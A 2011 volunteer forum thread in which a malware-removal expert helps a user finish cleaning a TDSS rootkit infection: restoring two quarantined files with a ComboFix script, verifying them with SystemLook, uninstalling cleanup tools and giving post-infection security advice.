Run this Cfscript. It shouldn't do a full scan and you'll be presented with a log; DeQuarantine_log.txt.

Please post that log and then we can proceed with the final stage.

Are things still running well?


COMBOFIX-Script

A word of warning: Please do not run ComboFix on your own. This tool is not a toy and not for everyday use.


  • Please open Notepad (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the code box below:

    Code: Select all
    DeQuarantine:: 
    C:\Qoobox\Quarantine\C\BibleSpeak\BibleSpeak.exe.vir
    C:\Qoobox\Quarantine\C\WINDOWS\stic1690.exe.vir
    Quit::
    

  • Save this as CFScript.txt and change the "Save as type" to "All Files" and place it on your desktop.

    Image
  • Very Important! Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before following the steps below. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
  • If you need help to disable your protection programs see here.
  • Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
  • When finished, it shall produce a log for you DeQuarantine_log.txt. Copy and paste the contents of the log in your next reply.

CAUTION: Do not mouse-click ComboFix's window while it is running. That may cause it to stall.
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 17th, 2011, 2:43 am

Hi -

things seem to be running fine.


I ran CFScript as you said - I got a fullscreen display of the dot text file - after 2 hours of no activity I stoped it. No dequarantine_log.txt but dequarantine.txt file

C:\Qoobox\Quarantine\C\BibleSpeak\BibleSpeak.exe.vir -> C:\BibleSpeak\BibleSpeak.exe ( 2768896 bytes )
C:\Qoobox\Quarantine\C\WINDOWS\stic1690.exe.vir -> C:\WINDOWS\stic1690.exe ( 221184 bytes )
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 17th, 2011, 4:45 pm

The logs now look good so with everything running well the PC seems at this stage to be free of malware. Install Flash Player and then we'll move to the final post & finishing cleaning up, all being well. ;)

Visit this page and run the Flash Player uninstaller first : http://kb2.adobe.com/cps/141/tn_14157.html


Then visit this site and install Flash Player : http://get.adobe.com/flashplayer/


Let me know how things are after that.
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 17th, 2011, 10:00 pm

Hi -

Flash Player uninstaller done

install Flash Player done
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 18th, 2011, 5:50 am

Hi

Good. Is everything OK with your e-mails now?

Before we uninstall it, I just want to check that combofix replaced those files correctly and then we should be all done. Looking again at the DeQuarantine log i would have expected to see confirmation that the files had indeed been copied over:
2 File(s) copied



SystemLook

You should still have this on your desktop.

  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    Code: Select all
    :file
    C:\BibleSpeak\BibleSpeak.exe 
    C:\WINDOWS\stic1690.exe

  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 18th, 2011, 10:12 am

Hi -

things looking very good.

SystemLook 04.09.10 by jpshortstuff
Log created at 10:00 on 18/06/2011 by admin
Administrator - Elevation successful

========== file ==========

C:\BibleSpeak\BibleSpeak.exe - File found and opened.
MD5: 91A4A401DA0F5ECDF5CDE3548B487AAD
Created at 03:12 on 17/06/2011
Modified at 04:50 on 17/06/2011
Size: 2768896 bytes
Attributes: --a----
FileDescription: Powerful Bible Software That Speaks!
FileVersion: 4.0
ProductVersion: 4.0
OriginalFilename: BibleSpeak.exe
InternalName: BibleSpeak
ProductName: BibleSpeak 4.0
CompanyName: Q-Software
LegalCopyright: Copyright (C) 2001-2008 Q-Software

C:\WINDOWS\stic1690.exe - File found and opened.
MD5: B8F2896EF8A3F6A19B4441409F5CC723
Created at 03:12 on 17/06/2011
Modified at 04:50 on 17/06/2011
Size: 221184 bytes
Attributes: --a----
FileDescription: StiCap Application
FileVersion: 1.26
ProductVersion: 1.26
OriginalFilename: StiCap1690.exe
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 18th, 2011, 10:30 am

Hi

Your log now appears to be clean. Congratulations!
This is my general post for when your logs show no more signs of malware ;) - Please let me know if you still are having problems with your computer and what these problems are. If all is well, please continue with the instructions below.



Uninstall Combofix

We Need to Remove ComboFix

  1. Please go to Start -> Run
  2. Enter "ComboFix /uninstall" (without quotes). Note the space between "ComboFix" and "/uninstall", it needs to be there.
    Image
  3. Press OK (Or hit enter).
  4. Allow ComboFix to remove itself.



OTC by OldTimer

Download OTC by Old Timer and save it to your Desktop.

  • Double-click OTC.exe
  • Click the CleanUp! button
  • Select Yes when the Begin cleanup Process? Prompt appears
  • If you are prompted to Reboot during the cleanup, select Yes
  • The tool will delete itself once it finishes, if not delete it by yourself


========================================

You have signs of "leftovers" in the logs from incomplete antivirus software removal. I would download and run the relevant removal tools for the programs. They work in much the same way as the Vipre removal tool (VPPClean.exe), I had you run previously.

http://www.avast.com/uninstall-utility <-- Avast Uninstall Utility
http://www.avg.com/us-en/utilities <-- AVG Remover

=========================================


Your computer was infected with a ROOTKIT. In particular, the TDSS rootkit, also known as Win32/Alureon. A rootkit is a set of software tools intended for concealing running processes, files or system data from the operating system.

Due to its rootkit functionality, it's impossible to tell what may have been done when the system was compromised.

Therefore it may be prudent to:

  1. Call all your banks, financial institutions, credit card companies and inform them that you may be a victim of identity theft and put a watch on your accounts.
  2. Change all your passwords (ISP login password, your email address(es) passwords, financial accounts, PayPal, eBay, Amazon, online groups and forums and any other online activities you carry out which require a username and password)

Windows Rootkits

How do I respond to a possible identity theft and how do I prevent it


=========================================


General Security and Computer Health

Below are some steps to follow in order to dramatically lower the chances of reinfection. You may have already implemented some of the steps below, however you should follow any steps that you have not already implemented.


  • Make sure that you keep your antivirus updated
    New viruses come out every minute, so it is essential that you have the latest signatures for your antivirus program to provide you with the best possible protection from malicious software.
    Note: You should only have one antivirus installed at a time. Having more than one antivirus program installed at once is likely to cause conflicts and may well decrease your overall protection as well as impairing the performance of your PC.
    Uninstall Tools for Major Antivirus Products

  • Security Updates for Windows, Internet Explorer & Microsoft Office
    Whenever a security problem in its software is found, Microsoft will usually create a patch so that after the patch is installed, attackers can't use the vulnerability to install malicious software on your PC. Keeping up with these patches will help to prevent malicious software being installed on your PC. Ensure you are registered for Windows updates via Start > right-click on My Computer > Properties > Automatic Updates tab or visit the Microsoft Update site on a regular basis.
    Note: The update process uses ActiveX, so you will need to use internet explorer for it and allow the ActiveX control to install.

  • Update Non-Microsoft Programs
    Microsoft isn't the only company whose products can contain security vulnerabilities. To check whether other programs running on your PC are in need of an update, you can use the Secunia Software Inspector - I suggest that you run it at least once a month.


Recommended Programs

I would recommend the download and installation of some or all of the following programs (if not already present), and the updating of them on a regular basis.

  • Malwarebytes' Anti-Malware
    As you already have Malwarebytes' Anti-Malware on board I would keep it regularly updated and run regular quick scans with it. Malwarebytes' Anti-Malware is an anti-malware application that can thoroughly remove even the most advanced malware. The Full version can be used as an addition to an anti-virus & includes a number of features, including a built in protection monitor that blocks malicious processes before they even start.
    It's IP Protection provides an additional layer of security for your computer, by preventing access to known malicious IP addresses and IP ranges.

  • Hosts File
    For added protection you may also like to add a host file. A simple explanation of what a Hosts file does is HERE and for more information regarding host files read HERE.

  • Use an alternative Internet Browser
    Many of the exploits are directed to users of Internet Explorer. Try using a different browser instead:
    Firefox
    Opera


Finally I am trying to make one point very clear. It is absolutely essential to keep all of your security programs up to date.

Also please read this great article by Tony Klein So How Did I Get Infected In First Place

I'd be grateful if you could reply to this post so that I know you have read it and, if you've no other questions, the thread can be closed.

Happy surfing and stay clean!
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 18th, 2011, 11:56 am

Hi -

1 )ComboFix uninstall done

2 ) OTC by old timer done

3 ) Avast Uninstall done

4 ) AVG Remover done

currently reading your referenced materials

I had hoped we could reduce the 60 some system backup/restore points before we are done.
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 18th, 2011, 12:05 pm

Hi

You should find that System Restore has been reset - Please let me know if it hasn't.
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 18th, 2011, 1:24 pm

Hi -

yes it was off - sorry

is it likely that the rootkit problem existed long before the visable network problems?
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 18th, 2011, 6:14 pm

Hi

If by "Network problems" you mean "my searches are almost always redirected to unrelated sites." The rootkit was the cause of this. When you first started noticing the re-directs, that would have been only a very short while after infection by the rootkit.
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK
Advertisement
Register to Remove

PreviousNext

  • Similar Topics
    Replies
    Views
    Last post

Return to Infected? Virus, malware, adware, ransomware, oh my!



Who is online

Users browsing this forum: No registered users and 51 guests

Contact us:

Advertisements do not imply our endorsement of that product or service. Register to remove all ads. The forum is run by volunteers who donate their time and expertise. We make every attempt to ensure that the help and advice posted is accurate and will not cause harm to your computer. However, we do not guarantee that they are accurate and they are to be used at your own risk. All trademarks are the property of their respective owners.

Member site: UNITE Against Malware